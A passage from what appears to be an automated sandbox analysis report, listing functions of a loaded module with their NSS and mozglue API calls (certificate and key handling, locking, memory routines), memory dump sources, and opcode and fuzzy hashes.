                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B02F
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B070
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B07B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B084
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58B09B
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B0C4
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B0F3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B0FC
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B137
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B140
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 235599594-0
                                                                                                                                                                                                                                                      • Opcode ID: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                                                      • Instruction ID: 53a065a8bdd7af5a03b410e6e3f8fbb46bdb11b6992e07d4f373d094171f7cbc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41aca5875bbf3eee739022bb302c8c112d907a50e3ba1a098c1f6f9ec41a9fa1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD914EB5901621DFCB00DF15CC8085ABBF5FF893187298569D8199BB22E732FD46CB91
                                                                                                                                                                                                                                                      Function 6C505CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502BF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C07
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: free.MOZGLUE(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C4A
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D0F
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D4E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D62
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D85
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D99
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505DFA
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E33
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E3E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E47
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E60
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E78
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EB9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EF0
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F3D
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F4B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4273776295-0
                                                                                                                                                                                                                                                      • Opcode ID: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                                                      • Instruction ID: 95fc93a99129fb44058bec2712c4c1a0bd3e7b655513e6d549f7dd94d7f6bee7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e07febf11c02ad113aa19ee35821bef8108fd9705b0d68142aca448de54ad06
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29719CB5A00B019FD710CF20DC88A96B7E5FF89308F148529E85E87B11EB32FA55CB95
                                                                                                                                                                                                                                                      Function 6C488DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?), ref: 6C488E22
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C488E36
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488E4F
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,?,?,?), ref: 6C488E78
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488E9B
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C488EAC
                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3(?,?), ref: 6C488EDE
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488EF0
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F00
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C488F0E
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C488F39
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F4A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F5B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C488F72
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C488F82
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1569127702-0
                                                                                                                                                                                                                                                      • Opcode ID: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
                                                                                                                                                                                                                                                      • Instruction ID: a745584637d8cc5bc10e931b35f04d6af9d19015eb49c830e6087c2b27b1739d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5401abd28fb0f4c4cc5684b7a6de1b222f0200cefef02c415dbe6ea3db6ec2d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C751E2B2E022159FEB00DF68CC84D6EB7B9EF85358B154129EC089B700E731ED4587E1
                                                                                                                                                                                                                                                      Function 6C580FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?), ref: 6C581000
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C581016
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C581021
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581046
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C58106B
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C581079
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C581096
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5810A7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5810B4
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810BF
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810CA
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810D5
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810E0
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(?), ref: 6C5810EB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C581105
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 8544004-0
                                                                                                                                                                                                                                                      • Opcode ID: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
                                                                                                                                                                                                                                                      • Instruction ID: 2c9ec5b42914452ba726b27b2f2fafc9b983fc7b437cc0c5fd2619e3603cbfa7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd589b434e47ccbd3c7968f0be40b3cfc80f6ae3a84d88973a1754235e37be1e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D31ABB5905511EBE702AF11EC45A46B771FF41358B184134E80902F61E732FD78DBC6
                                                                                                                                                                                                                                                      Function 6C3FDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C3FDD56
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C3FDD7C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C3FDE67
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C3FDEC4
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FDECD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                      • Opcode ID: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
                                                                                                                                                                                                                                                      • Instruction ID: d0f333e8b8df637d46ff0cc7fdd9f33db8f665a928ad4c3e354ca7e95eeb0057
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c48002f512951e690adbe6fcb8b55fd4b03a0915687623715ae28c554e327d9c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EA1E4716043019BD710DF29C884A6AB7F5AF95308F058D2DF8A98BB41E731E846CFA2
                                                                                                                                                                                                                                                      Function 6C4BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4BEE0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4BEEE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C4B1D7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C4B1D8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: PR_Unlock.NSS3(?), ref: 6C4B1DD3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4BEE51
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4BEE65
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4BEEA2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEEBB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEED0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4BEF48
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEF68
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEF7D
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BEFA4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEFDA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BF055
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BF060
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2524771861-0
                                                                                                                                                                                                                                                      • Opcode ID: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
                                                                                                                                                                                                                                                      • Instruction ID: 11f6e83c7b709ec8ef11116217ce059535c92d5c2547ef586ae2bb3a393a3a0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A815D75A00209ABEB00DFA5DC85EDE7BB5BF48319F154068F909A7B11E731E9248BE1
                                                                                                                                                                                                                                                      Function 6C484CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_SignatureLen.NSS3(?), ref: 6C484D80
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C484D95
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484DF2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C484E2C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C484E43
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484E58
                                                                                                                                                                                                                                                      • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C484E85
                                                                                                                                                                                                                                                      • DER_Encode_Util.NSS3(?,?,6C5D05A4,00000000), ref: 6C484EA7
                                                                                                                                                                                                                                                      • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C484F17
                                                                                                                                                                                                                                                      • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C484F45
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484F62
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C484F7A
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C484F89
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484FC8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2843999940-0
                                                                                                                                                                                                                                                      • Opcode ID: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                                                      • Instruction ID: 5c63956e96acee10e56fcd7e79b5c755962903df295741b02458712373cb5646
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0881AF71A0A301AFE701CF28D850F5AB7E8AB84398F15952DFA58DB740E731E905CB92
                                                                                                                                                                                                                                                      Function 6C4C5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C4C5C9B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C4C5CF4
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C4C5CFD
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C4C5D42
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C4C5D4E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5D78
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5E18
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5E5E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C5E72
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5E8B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
